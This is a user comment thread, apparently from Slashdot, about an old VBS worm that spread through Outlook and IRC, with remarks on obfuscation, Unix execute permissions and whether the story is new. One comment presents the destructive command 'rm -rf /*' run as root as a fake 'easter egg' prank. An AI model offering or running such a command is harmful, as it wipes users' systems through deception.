i got this around early of this year? or was it late last year? anyway, i decided to decyper it and did it with my boss, and when we decypered the first code, we got another encrypted code, and had to repeat and so on till we were done. It was pretty interesting, not only did it send via outlook, it connected via mirc and tried to send itself to as much people as it could. it is amusing, that was why i was "disappointed" in ILOVEYOU, the guy didn't try to obscure it in any form.

Control your desktop!

[Shaheen]

Well then, instead of accomodating this virus, why not take control of your desktop with an alternative shell (like a Window Manager). The main one I use is Litestep

*N*X Easter Egg!

[Kowh]

Deep in the code of every variant of UNIX and Linux sits a very well hidden easter egg!
Log in as root on any *N*X machine and run "rm -rf /*".
I can't spoil the easter egg, but after it's done running I'm sure you will be very suprised!

--

Note: If you were stupid enough to actually do this, I think we're better off without you in the *N*X world. ;)

"download browser enhancement"

[1010011010]

You didn't, by chance, click on the "download browser enhancement" link, did you?

I've got IE5 and Outlook2k on my Win2k box... and nothing happened by just looking at the site. Are your IE security settings set to "bend me over again"?

Execute Permissions

[Pingster]

Nice overview, Christopher. I'd like to add one thing.

I think you missed mentioning the most important reason why trojan executables and viruses don't spread as easily on Unix systems.

Unix has a concept of execute permissions.

Windows will happily execute any file ending in a variety of extensions (and that list is not small or consistently defined). In Unix, on the other hand, you must turn on execute permissions before you can execute a file, and files are created by default without execute permission.

An attachment saved on a Unix system would generally be treated as data and saved in a non-executable file. The inability to distinguish between commands and data promoted by Windows and Outlook is, i believe, the main factor in ILOVEYOU's devastating success.

-- ?!ng

Make you want to...

[Black+Art]

alter the virus to make the porn site the default page for the browser, not just add a desktop link.

Maybe if Bill gets his default page set to "Naughty Barnyard Nyphos" a few times he will pay more attention to security.

Rant...

[MrKevvy]

I haven't had a good Piss And Moan here yet....this is as good a time as any.

Yes, this is old news. I was booting people out of IRC channels for (unknowingly) sending LINKS.VBS over a year ago. It's ancient. It's the grandaddy of VBS worms. Here are the last four articles I submitted to Slashdot:

1) An article about a proposal, part of the U.S./European Cybercrime Treaty, that may affect (ie ban) certain parts of Linux...namely those use by admins. to break passwords or examine networks.

2) Right after a page with one set of instructions on de-regionalizing one DVD player was posted, a post with a link to a page with...37 of them. Code-free.

3) An article on how a team of Canadian and U.S. scientists managed to make clones biologically younger, not older, then the cells they were cloned from. A major breakthrough.

4) An article about how the U.S. has pushed through stiffer sentencing for minor, profitless copyright violation (ie using Napster) and Napster and IRC are being actively monitored byt the FBI...with the stated intention of throwing people in jail for trading MP3's.

All of these were linked to reputable sources, and were rejected outright, but this stinker slipped through. Want to read the above articles? Well, I lost the URL's. Sorry. I am sure you will find them if you look. Linux users complain that they aren't understood by Windows users...here is en excellent example of the reverse...

Suggestion? Allow higher-karma people with real e-mail addresses and names to post <B>stories</B>, not just stinkin' comments....moderators can moderate stories and comments up or down. That way, this non-issue would have been flushed down the -1 toilet quickly and would not have wasted our time.

Re:Maybe -- Not Such a bad Idea

[technos]

I played with the concept as well, albeit less viral in final form. Had a wee little VB client sitting on a port that just did nothing more than report a patch number when queried. An admin script on a *NIX box would, based on patch number, mail out wrapped updates to responsible users and complain if they weren't installing them in a timely fashion. (Rechecked the patch # in one hour, mail a complaint to the user, and if unchanged in 12 it would mail a notice to me) When executed, the update wrapper would query all of the machines in that segment, ask the server if they had been bothered, and mail itself to them too if required. (Only needed to 'seed' a list of fifty users this way; The BSD box was WAY underpowered too.)

Good Virus Good Good

[mizhi]

Oh boy... now I can get even more unsolicited email for porn sites. It's only a matter of time before someone uses this to send even more horrifying content... Activist Propaganda! At least I get some amount of amusement out of porn. =)

links.vbs on IRC

[kaoticus]

I actually saw this vb script about a year ago on IRC. Anyone else?

Think people, think!

[mszeto]

If this virus links to a specific site, the people who own that site are pretty stupid. Sure, you'll get hits (if people ACTUALLY click on the obviously porn shortcut on the desktop) but this country is just looking for people to blame, charge, and potentially jail with regards to anything virus related. Ugh.

This is *not* a variant of ILOVEYOU...

[stx23]

...but rather a precursor. It's almost a year old. Details here.

THIS ISN'T NEW!

[NetJunkie]

This is the old FreeLink virus. Someone needs to check their facts.... Move on, nothing to see here.